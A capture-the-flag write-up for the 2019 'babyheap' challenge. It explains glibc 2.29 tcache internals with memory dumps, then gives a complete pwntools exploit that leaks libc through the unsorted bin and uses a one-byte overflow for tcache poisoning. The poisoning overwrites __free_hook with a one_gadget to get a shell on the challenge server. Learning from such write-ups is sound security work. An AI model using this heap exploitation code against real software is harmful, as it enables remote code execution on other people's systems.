1. Introduction
  2. Tcache in GLIBC
    1. Example
  3. Challenge Solution
    1. Info Leak
    2. Code Execution

Introduction

During this challenge 2 stripped binaries were given:

With the challenge name, I already knew that heap exploitation was involved in the solution to this challenge. Checking the given libc version revelead the following:

$ strings libc.so | grep version
(...)
GNU C Library (Ubuntu GLIBC 2.29-0ubuntu2) stable release version 2.29.
(...)

This libc version (2.29) corresponds to the default library present in Ubuntu 19.04 libc (at the time of writing).

Furthermore, this libc version has the already known mechanism of TCache bins, implemented in the Ubuntu libc since version 2.27.

An explanation on how this mechanism works and was abused during this challenge is described in the following section (If you already know about the Tcache implementation, please skip until the Challenge Solution section).


Tcache in GLIBC

Prior knowdlege on how the allocator system is implemented is not required but recommended, refer to SploitFun and How2Heap.

Two important structures were added in the malloc/malloc.c file (malloc.c):

/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
# define TCACHE_MAX_BINS        64
# define MAX_TCACHE_SIZE    tidx2usize (TCACHE_MAX_BINS-1)

# define tidx2usize(idx)    (((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)

/* This is another arbitrary limit, which tunables can change.  Each
   tcache bin will hold at most this number of chunks.  */
# define TCACHE_FILL_COUNT 7

typedef struct tcache_entry
{
  struct tcache_entry *next;
  struct tcache_perthread_struct *key;
} tcache_entry;

/* There is one of these for each thread, which contains the
   per-thread cache (hence "tcache_perthread_struct").  Keeping
   overall size low is mildly important.  Note that COUNTS and ENTRIES
   are redundant (we could have just counted the linked list each
   time), this is for performance reasons.  */
typedef struct tcache_perthread_struct
{
  /* One entry per bin size */
  char counts[TCACHE_MAX_BINS];
  /* One entry per bin size (fwd single linked list) */
  tcache_entry *entries[TCACHE_MAX_BINS];
} tcache_perthread_struct;

The tcache_perthread_struct data structure is allocated during heap initialization with the internal _int_malloc inside the tcache_init function. This means that this structure will always be on the top of the heap. The entries are stored in a forward single linked list, where the next free chunk is referenced in the fd field of the chunk structure.

To work with this new data structure, 2 new functions where added. The first function, named tcache_get, is used to return a bin from the tcache given the size index. It is mainly used in the malloc function. It also decrements the counter, of the same index size, inside the counts array of the structure. and obtains the next entry from the fd pointer (next) of the returned chunk.

void * tcache_get (size_t tc_idx)
{
  // Obtain the top entry of the the asked size
  tcache_entry *e = tcache->entries[tc_idx];
  assert (tc_idx < TCACHE_MAX_BINS);
  // Makes sure that the entry is not null
  assert (tcache->entries[tc_idx] > 0);
  // Stores the new top chunk into the corresponding entry
  tcache->entries[tc_idx] = e->next;
  // Decrements the counter, so we don't have to count the linked list
  --(tcache->counts[tc_idx]);
  e->key = NULL;
  return (void *) e;
}

The line tcache->entries[tc_idx] = e->next; is important, since no checks are performed on the moved pointer.

The second function is the inverse of the previous one. This function receives a chunk and the corresponding tcache index and pushes to the top of the linked list the given chunk address. After the new chunk is stored and referenced as the new top chunk, the counts is incremented.

void tcache_put (mchunkptr chunk, size_t tc_idx)
{
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);
  assert (tc_idx < TCACHE_MAX_BINS);

  /* Mark this chunk as "in the tcache" so the test in _int_free will
     detect a double free.  */
  e->key = tcache;

  e->next = tcache->entries[tc_idx];
  tcache->entries[tc_idx] = e;
  ++(tcache->counts[tc_idx]);
}

Example

In order to demonstrate how this works, the following example is explained step by step during the execution on an Ubuntu 19.04 VM:

#include <stdlib.h>

int main(){

  void *ptr1;
  void *ptr2;

  // [A]
  ptr1 = malloc(0x20);
  // [B]
  ptr2 = malloc(0x20);

  // [C]
  free(ptr1);
  // [D]
  free(ptr2);

  // [E]
  ptr1 = malloc(0x20);
  // [F]
  ptr2 = malloc(0x20);

  return 0;
}

Step [A]

In this case, the Tcache is initialized and a chunk of size 0x30 is returned via the normal _int_malloc call since no earlier tcache bins exist.

void * __libc_malloc (size_t bytes)
{

  MAYBE_INIT_TCACHE ();

  // (...)
  arena_get (ar_ptr, bytes);
  victim = _int_malloc (ar_ptr, bytes);
    // (...)

  return victim;

}

Result in memory of [A] (removed 0's to cut space):

           0x555555559000: 0x0000000000000000  0x0000000000000251
tcache --> 0x555555559010: 0x0000000000000000  0x0000000000000000
           0x555555559020: 0x0000000000000000  0x0000000000000000
           0x555555559030: 0x0000000000000000  0x0000000000000000
           0x555555559040: 0x0000000000000000  0x0000000000000000
           0x555555559050: 0x0000000000000000  0x0000000000000000
                ....           .......              .......
           0x555555559240: 0x0000000000000000  0x0000000000000000
           0x555555559250: 0x0000000000000000  0x0000000000000031 <--+
           0x555555559260: 0x0000000000000000  0x0000000000000000    | chunk A
           0x555555559270: 0x0000000000000000  0x0000000000000000 <--+
           0x555555559280: 0x0000000000000000  0x0000000000020d81

Step [B]

Now, a second allocation is performed:

           0x555555559000: 0x0000000000000000  0x0000000000000251
tcache --> 0x555555559010: 0x0000000000000000  0x0000000000000000
           0x555555559020: 0x0000000000000000  0x0000000000000000
           0x555555559030: 0x0000000000000000  0x0000000000000000
           0x555555559040: 0x0000000000000000  0x0000000000000000
           0x555555559050: 0x0000000000000000  0x0000000000000000
                ....           .......              .......
           0x555555559240: 0x0000000000000000  0x0000000000000000
           0x555555559250: 0x0000000000000000  0x0000000000000031 <--+
           0x555555559260: 0x0000000000000000  0x0000000000000000    | chunk A
           0x555555559270: 0x0000000000000000  0x0000000000000000 <--+

           0x555555559280: 0x0000000000000000  0x0000000000000031 <--+
           0x555555559290: 0x0000000000000000  0x0000000000000000    | chunk B
           0x5555555592a0: 0x0000000000000000  0x0000000000000000 <--+
           0x5555555592b0: 0x0000000000000000  0x0000000000020d51

Step [C]

Now comes the fun part. Since we are using tcache, the chunk will be inserted into the tcache bin list of its corresponding size, in this case, index 1 for size 0x30. The code snippet responsible for performing this action is the following:

static void _int_free (mstate av, mchunkptr p, int have_lock)
{

    // In our case tc_idx is 1
    size_t tc_idx = csize2tidx (size);

    if (tcache != NULL && tc_idx < 64) // TCACHE_MAX_BINS
    {
      //(...)
      if (tcache->counts[tc_idx] < 7) // TCACHE_FILL_COUNT
      {
        tcache_put (p, tc_idx);
        return;
      }
    }
    // (...)
}

If we go back to the tcache_put code, we will see that the result displayed in the following diagram corresponds to the code:

typedef struct tcache_perthread_struct
{
  char counts[TCACHE_MAX_BINS];
  tcache_entry *entries[TCACHE_MAX_BINS];

} tcache_perthread_struct;


void tcache_put (mchunkptr chunk, size_t tc_idx)
{
  // 0x555555559260 is returned
  tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

  // tcache is at 0x555555559010 (tcache_perthread_struct)
  // e->key corresponds to the chunk bk ptr
  e->key = tcache;

  // tcache->entries start at 0x555555559050
  // index 1 corresponds to the content at 0x555555559058
  // 0's in our case
  e->next = tcache->entries[tc_idx];
  // e pointer is stored in 0x555555559058
  tcache->entries[tc_idx] = e;
  // index 1 corresponding to 0x555555559011 will
  // be incremented by 1
  ++(tcache->counts[tc_idx]);
}

The memory result after step [C] (removed 0's to reduce space):

              0x555555559000: 0x0000000000000000  0x0000000000000251
   tcache --> 0x555555559010: 0x0000000000000100  0x0000000000000000
              0x555555559020: 0x0000000000000000  0x0000000000000000
              0x555555559030: 0x0000000000000000  0x0000000000000000
              0x555555559040: 0x0000000000000000  0x0000000000000000
              0x555555559050: 0x0000000000000000  0x0000555555559260 <-- tcache->entries[1]
                   ....           .......              .......
              0x555555559240: 0x0000000000000000  0x0000000000000000
         +--> 0x555555559250: 0x0000000000000000  0x0000000000000031
chunk A  |    0x555555559260: 0x0000000000000000  0x0000555555559010 <-- chunk A bk ptr
         +--> 0x555555559270: 0x0000000000000000  0x0000000000000000

         +--> 0x555555559280: 0x0000000000000000  0x0000000000000031
chunk B  |    0x555555559290: 0x0000000000000000  0x0000000000000000
         +--> 0x5555555592a0: 0x0000000000000000  0x0000000000000000
              0x5555555592b0: 0x0000000000000000  0x0000000000020d51

Step [D]

The same code as step C is executed, however, note how the chunk A->fd pointer is filled with the chunk B address. Furthermore, the tcache->entries[1] and tcache->counts[1] also reflects the new bin.

              0x555555559000: 0x0000000000000000  0x0000000000000251
   tcache --> 0x555555559010: 0x0000000000000200  0x0000000000000000
              0x555555559020: 0x0000000000000000  0x0000000000000000
              0x555555559030: 0x0000000000000000  0x0000000000000000
              0x555555559040: 0x0000000000000000  0x0000000000000000
              0x555555559050: 0x0000000000000000  0x0000555555559290 <-- tcache->entries[1]
                   ....           .......              .......
              0x555555559240: 0x0000000000000000  0x0000000000000000
         +--> 0x555555559250: 0x0000000000000000  0x0000000000000031
chunk A  |    0x555555559260: 0x0000000000000000  0x0000555555559010 <-- chunk A bk ptr
         +--> 0x555555559270: 0x0000000000000000  0x0000000000000000

         +--> 0x555555559280: 0x0000000000000000  0x0000000000000031
chunk B  |    0x555555559290: 0x0000555555559260  0x0000555555559010 <-- chunk B fd and bk ptr
         +--> 0x5555555592a0: 0x0000000000000000  0x0000000000000000
              0x5555555592b0: 0x0000000000000000  0x0000000000020d51

Step [E]

A new allocation of the same size 0x20 is done. During malloc, the code checks if a tcache bin of the requested size is present. If it is, the tcache_get function will be called with the index size as an argument and the resulting chunk will be returned to the user.

void * __libc_malloc (size_t bytes)
{

  // TCACHE_FILL_COUNT
  if (tc_idx < 7
      && tcache
      && tcache->entries[tc_idx] != NULL)
    {
      return tcache_get (tc_idx);
    }
  //(...)
}

The tcache_get code will return the last freed chunk (B) doing the following:

void * tcache_get (size_t tc_idx)
{
  // Will get the pointer 0x555555559290 (Chunk B)
  tcache_entry *e = tcache->entries[tc_idx];
  // The returned chunk->fd is copied into the entries array
  tcache->entries[tc_idx] = e->next;
  // Decrements the counter
  --(tcache->counts[tc_idx]);
  // Sets the bk pointer of the returned chunk to 0
  e->key = NULL;
  return (void *) e;
}

Notice that the returned chunk fd pointer is not cleared, meaning that the old value is still there. Also, if the user is able to override the fd pointer of the freed chunk, using any sort of UAF or overflow, he will be able to control the next returned pointer by malloc. (Since the fd pointer will get stored as the next entry in the tcache->entries).

Memory result after step [E]:

                0x555555559000: 0x0000000000000000  0x0000000000000251
   tcache   --> 0x555555559010: 0x0000000000000100  0x0000000000000000
                0x555555559020: 0x0000000000000000  0x0000000000000000
                0x555555559030: 0x0000000000000000  0x0000000000000000
                0x555555559040: 0x0000000000000000  0x0000000000000000
                0x555555559050: 0x0000000000000000  0x0000555555559260 <-- tcache->entries[1]
                     ....           .......              .......
                0x555555559240: 0x0000000000000000  0x0000000000000000
           +--> 0x555555559250: 0x0000000000000000  0x0000000000000031
  chunk A  |    0x555555559260: 0x0000000000000000  0x0000555555559010 <-- chunk A bk ptr
           +--> 0x555555559270: 0x0000000000000000  0x0000000000000000

           +--> 0x555555559280: 0x0000000000000000  0x0000000000000031
  chunk B  |    0x555555559290: 0x0000555555559260  0x0000000000000000 <-- chunk B fd and bk ptr
           +--> 0x5555555592a0: 0x0000000000000000  0x0000000000000000
                0x5555555592b0: 0x0000000000000000  0x0000000000020d51

Step [F]

Finally, one last allocation is done. The same code as step [E] will get executed and the chunk A returned to the user:

void * tcache_get (size_t tc_idx)
{
  // Will get the pointer 0x555555559260 (Chunk A)
  tcache_entry *e = tcache->entries[tc_idx];
  // The returned chunk->fd is copied into the entries array
  // (0's in this case)
  tcache->entries[tc_idx] = e->next;
  // Decrements the counter
  --(tcache->counts[tc_idx]);
  // Sets the bk pointer of the returned chunk to 0
  e->key = NULL;
  return (void *) e;
}

Memory result after step [F]:

             0x555555559000: 0x0000000000000000  0x0000000000000251
  tcache --> 0x555555559010: 0x0000000000000000  0x0000000000000000
             0x555555559020: 0x0000000000000000  0x0000000000000000
             0x555555559030: 0x0000000000000000  0x0000000000000000
             0x555555559040: 0x0000000000000000  0x0000000000000000
             0x555555559050: 0x0000000000000000  0x0000000000000000 <-- tcache->entries[1]
                  ....           .......              .......
             0x555555559240: 0x0000000000000000  0x0000000000000000
        +--> 0x555555559250: 0x0000000000000000  0x0000000000000031
chunk A |    0x555555559260: 0x0000000000000000  0x0000000000000000 <-- chunk A bk ptr
        +--> 0x555555559270: 0x0000000000000000  0x0000000000000000

        +--> 0x555555559280: 0x0000000000000000  0x0000000000000031
chunk B |    0x555555559290: 0x0000555555559260  0x0000000000000000 <-- chunk B fd and bk ptr
        +--> 0x5555555592a0: 0x0000000000000000  0x0000000000000000
             0x5555555592b0: 0x0000000000000000  0x0000000000020d51

Challenge Solution

Executing and playing with the challenge shows the following:

$ ./babyheap
-----Yet Another Babyheap!-----
[M]alloc
[F]ree
[S]how
[E]xit
------------------------
Command:
> M
Size:
> 20
Content:
> AAAA
-----Yet Another Babyheap!-----
[M]alloc
[F]ree
[S]how
[E]xit
------------------------
Command:
> S
(Starting from 0) Index:
> 0
AAAA
-----Yet Another Babyheap!-----
[M]alloc
[F]ree
[S]how
[E]xit
------------------------
Command:
> F
(Starting from 0) Index:
>
0
-----Yet Another Babyheap!-----
[M]alloc
[F]ree
[S]how
[E]xit
------------------------
Command:
> S
(Starting from 0) Index:
> 0
Show Error

As seen, we can Malloc, Show and Free data. The Malloc makes sure no more than 10 entries are allocated at the same time. The entries are stored using the following structure in a static array in the .bss segment:

struct text_entry {
    void *ptr;
    int size;
}

// address 0x4060
struct text_entry entries[10];

The Malloc code allows only sizes smaller than 0x178 (included). If the user given size is smaller than 0xF8 (included) a malloc call with size 0xF8 is forced. Otherwise, a malloc of size 0x178 is executed and stored in the corresponding free entry (remember that only 10 entries are allowed). After the chunk is returned, it is filled byte by byte. However, there exists one byte overflow. The check is not properly done as it allows the user to write 1 byte past the allocated size, as seen here.

def do_malloc():
    # i -> contains an empty index in the entries array (less than 10)

    size = get_int()

    entry = &entries[i]

    if size - 1 > 0x177:
        return ERROR

    if size <= 0xF8:
        entry->ptr = malloc(0xF8)
    else:
        entry->ptr = malloc(0x178)

    index = byte = 0

    while index <= size and byte != '\n':
        byte = read(1) # Reads 1 byte
        entry->ptr[index] = byte
        index += 1

    entry->size = size

As already known, by default the tcache bins entries allow up to 7 bins in the linked list. That means that if we get past that number, normal bins will be used (including unsorted bin).

The code performing the Free operation can be translated to the following pseudocode:

def do_free():

    index = get_int()

    if index > 9:
        return ERROR

    entry = &entries[index]

    if !entry:
        return ERROR

    memset(entry->ptr, 0, entry->size)
    free(entry->ptr)

    entry->ptr = 0
    entry->size = 0

As seen in line 13, the data stored in the chunk is cleared using the entry->size as the length. However, as already seen in do_malloc (here), the stored size is the user-controlled size and not the real chunk size. That means, if we ask to allocate n bytes, only n bytes will get cleared. This can be abused in our side for memory leaking.

Finally, the Show code is very simple:

def do_show():

    index = get_int()

    if index > 0:
        return ERROR

    entry = &entries[index]

    if !entry:
        return ERROR

    puts(entry->ptr)

Having explained all the components of the binary we can start with the real exploitation. All the protections in this binary are enabled:

$ pwn checksec babyheap
Canary                        : Yes
NX                            : Yes
PIE                           : Yes
Fortify                       : Yes
RelRO                         : Full

Info leak

In order to leak information from the heap, we are going to allocate enough chunks, so once they are freed, an unsorted chunk will be set. To do so, we need to allocate 7 chunks to bypass the tcache bin list. One more chunk, that once freed, it will not fit inside the tcache list. And finally, one more chunk to avoid top chunk consolidation. In total, 9 chunks are needed.

If we now free the 8th and 9th chunk (index 7 and 8, in this order), the unlinked chunk will be inserted in the unsorted bin, with the main_arena + x from libc, in both, fd and bk pointers. If we now allocate a new chunk, tcache entries will be used before returning the unsorted chunk. That means that we need to allocate 7 chunks to empty the tcache list, before getting the unsorted chunk.

During the 8th allocation, corresponding to the unsorted bin, the content of the fd pointer will be leaked with the do_show function.

However, there is one key point during the process. Once the do_free function is executed, the memset function (here), will remove the content of the chunk. We can bypass this by asking to allocate a chunk of size 1, which will override the LSB of the fd pointer.

The plan is the following:

  • Allocate 7 chunks of size <= 0xF8.
  • Allocate 1 more chunk of size 1.
    • This is our unsorted chunk
  • Allocate one last chunk of size <= 0xF8 to avoid top chunk consolidation.
  • Free chunks from index 0 to 6 (included).
    • They will be inserted in the tcache bin list
  • Free chunk at index 7.
    • This chunk will be moved to the unsorted bin.
  • Free chunk at index 8.
    • This will cause chunks at index 7 and 8 to be unlinked, filling the fd and the LSB byte cleared to 0 ( by memset ).
  • Allocate 7 chunks of size <= 0xF8, so the tcache bin list is cleared
  • Allocate a chunk of size 1, and write @ to it.
    • This is our unsorted chunk
    • The @ is 0x40 which is the offset of the main_arena from the leaked data and will be written in the LSB of the fd pointer.
  • Show the content of the chunk at index 7, which is the unsorted bin.
  • Calculate the libc base address

The code corresponding to the previous explanation can be seen in the full solution between lines 27 and 62.

Code execution

Code execution can be achieved thanks to the one byte overflow. With this byte, we can change the size of the next chunk. Once this chunk is freed, it will be inserted in a fake tache bin list. Since we can allocate 2 different sizes, we can return this fake chunk and override chunk metadata of the next chunk including the fd. With a new allocation, the fd pointer will be written into the tcache->entries and the next allocation will return an arbitrary pointer controlled by us. The idea is to return the address of __free_hook and override the value with a one_gadget. To do so, we are going to allocate 3 chunks of size 0xF8:

0x555555559250: 0x0000000000000000  0x0000000000000101  <--+
0x555555559260: 0x4141414141414141  0x0000000000000000     |
0x555555559270: 0x0000000000000000  0x0000000000000000     |
0x555555559280: 0x0000000000000000  0x0000000000000000     |
0x555555559290: 0x0000000000000000  0x0000000000000000     |
0x5555555592a0: 0x0000000000000000  0x0000000000000000     |
0x5555555592b0: 0x0000000000000000  0x0000000000000000     |
0x5555555592c0: 0x0000000000000000  0x0000000000000000     |  chunk A
0x5555555592d0: 0x0000000000000000  0x0000000000000000     |
0x5555555592e0: 0x0000000000000000  0x0000000000000000     |
0x5555555592f0: 0x0000000000000000  0x0000000000000000     |
0x555555559300: 0x0000000000000000  0x0000000000000000     |
0x555555559310: 0x0000000000000000  0x0000000000000000     |
0x555555559320: 0x0000000000000000  0x0000000000000000     |
0x555555559330: 0x0000000000000000  0x0000000000000000     |
0x555555559340: 0x0000000000000000  0x0000000000000000  <--+

0x555555559350: 0x0000000000000000  0x0000000000000101  <--+
0x555555559360: 0x4242424242424242  0x0000000000000000     |
0x555555559370: 0x0000000000000000  0x0000000000000000     |
0x555555559380: 0x0000000000000000  0x0000000000000000     |
0x555555559390: 0x0000000000000000  0x0000000000000000     |
0x5555555593a0: 0x0000000000000000  0x0000000000000000     |
0x5555555593b0: 0x0000000000000000  0x0000000000000000     |
0x5555555593c0: 0x0000000000000000  0x0000000000000000     |  chunk B
0x5555555593d0: 0x0000000000000000  0x0000000000000000     |
0x5555555593e0: 0x0000000000000000  0x0000000000000000     |
0x5555555593f0: 0x0000000000000000  0x0000000000000000     |
0x555555559400: 0x0000000000000000  0x0000000000000000     |
0x555555559410: 0x0000000000000000  0x0000000000000000     |
0x555555559420: 0x0000000000000000  0x0000000000000000     |
0x555555559430: 0x0000000000000000  0x0000000000000000     |
0x555555559440: 0x0000000000000000  0x0000000000000000  <--+

0x555555559450: 0x0000000000000000  0x0000000000000101  <--+
0x555555559460: 0x0000000043434343 0x0000000000000000     |  chunk C

After this layout is satisfied we are going to do the following:

  • Free chunk C
    • So it is inserted in the tcache bin list.
  • Free chunk A.
  • Allocate a new chunk and override the size of chunk B, with 0x181
    • This is the size of an allocated 0x178 chunk
  • Free chunk B.
    • This chunk will be inserted in the 0x180 tcache bin list instead of 0x100.
  • Allocate a chunk of size 0x178 that will return our fake chunk.
    • With it, override the chunk C, since the separation is smaller than the size.
    • The fd pointer will be filled with the __free_hook address
  • Allocate a dummy 0x178 chunk.
    • This will write the __free_hook address into tcache->entries.
  • Allocate the final 0x178 chunk, that will return the __free_hook address.
    • The data that we will write corresponds to a one_gadget that will execute a shell.
  • Call free, so we trigger the __free_hook.

The code corresponding to this segment can be seen between lines 68 and 93.

To obtain the one_gadget I used David's tool. It can be found here.

Full exploit

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

BIN_NAME     = "./babyheap"
LIBC_NAME    = "./libc.so"

def do_malloc(size, content):
    p.sendlineafter('Command:', 'M')
    p.sendlineafter('Size:', str(size))
    p.sendlineafter('Content:', content)

def do_free(index):
    p.sendlineafter('Command:', 'F')
    p.sendlineafter('>', str(index))

def do_show(index):
    p.sendlineafter('Command:', 'S')
    p.sendlineafter('>', str(index))
    p.recvuntil('> ', drop=True)

def do_exit(index):
    p.sendlineafter('Command:', 'E')

def exploit(p):

    for i in range(7):
        do_malloc(20, 'dummy')

    do_malloc(1, 'A') # unsorted chunk
    do_malloc(1, 'B') # dummy

    # All of them ends up in the tcache
    for i in range(7):
        do_free(i)

    do_free(7) # unsorted chunk
    do_free(8) # unlink

    # Allocate 7 chunks. Clear tcache entries
    for i in range(7):
        do_malloc(1, 'B') # dummy


    # The leaked address corresponds to main_arena with the last byte,
    # incorrectly set to the allocated value, since the main_arena is
    # at offset 0x40, an @ is send

    # The next allocation will use the unsorted bin and will be at index 7
    do_malloc(1, '@')

    # Leak the fd pointer
    do_show(7)

    main_arena = u64(p.recvuntil('\n', drop=True).ljust(8,'\x00'))

    libc_base      = main_arena - 0x1e4c40
    libc_free_hook = libc_base + libc.symbols['__free_hook']

    log.info("Libc main_arena @ 0x%x",  main_arena)
    log.info("Libc @ 0x%x",             libc_base)
    log.info("Libc __free_hook @ 0x%x", libc_free_hook)

    # start clean
    for i in range(7):
        do_free(i)

    do_malloc(0xf8, 'AAAAAAAA')
    do_malloc(0xf8, 'BBBBBBBB')
    do_malloc(0xf8, 'CCCC') # less than libc address length

    do_free(2) # Free chunk C
    do_free(0) # Free chunk A

    # This overrides chunk B size
    # Perform a 1 byte overflow. The next allocation will allow to override
    # the fd and obtain an arbitrary writable address by tcache poisoning
    # __free_hook in this case
    do_malloc(0xf8, 'A'*0xf8 + '\x81') # set size to 0x181 (alloc of 0x178)

    do_free(1) # Free chunk B

    # This overrides chunk C fd ptr (chunk C is in the tcache)
    data = 'A' * 0xf8 + "BBBBBBBB" + p64(libc_free_hook).replace('\x00', '')
    do_malloc(0x178, data)

    do_malloc(0xf8, "DDDDDDDD") # dummy

    data = p64(libc_base + 0x106ef8).replace('\x00','') # one gadget
    do_malloc(0xf8, data)

    # free -> __free_hook
    do_free(0)

    p.interactive()

if __name__ == "__main__":

    libc = ELF(LIBC_NAME)
    env  = dict(LD_PRELOAD = LIBC_NAME)

    p = remote("babyheap.quals2019.oooverflow.io", 5000)
    # p = process(BIN_NAME, env=env)

    exploit(p)
$ cat flag
OOO{4_b4byh34p_h45_nOOO_n4m3}